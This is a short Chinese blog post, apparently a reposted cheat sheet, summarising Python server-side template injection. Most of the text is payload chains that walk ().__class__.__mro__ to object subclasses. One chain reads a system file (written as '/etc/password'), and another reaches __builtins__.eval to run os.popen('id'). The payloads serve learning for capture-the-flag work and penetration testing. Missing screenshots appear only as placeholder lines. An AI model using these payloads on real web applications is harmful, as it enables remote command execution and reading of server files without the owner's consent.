当前位置：网站首页>模板注入总结

模板注入总结

2022-07-28 14:15:00 【[email protected]】

1，常用命令
在这里插入图片描述

().__class__ 当前类

在这里插入图片描述

().__class__.__mro__ 当前类继承了哪些类

在这里插入图片描述

().__class__.__mro__[-1].__subclasses__() object类的所有子类，具体就可以利用这个来找自己所需的类

在这里插入图片描述
比如有时第40为file函数，就可以通过

''.__class__.__mro__[-1].__subclasses__()[40]("/etc/password").read()  来进行读取文件内容

''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__.__builtins__ 查看子类列表中第59个这个下面的内置函数，找到所需的

在这里插入图片描述

''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__.__builtins__.eval("__import__('os').popen('id').read()")  找到合适的函数后，可以利用如上所示来进行利用

在这里插入图片描述
更多可以参考：

https://www.cnblogs.com/vstar-o/p/13719889.html

版权声明
本文为[[email protected]]所创，转载请带上原文链接，感谢
https://blog.csdn.net/qq_38641816/article/details/108965187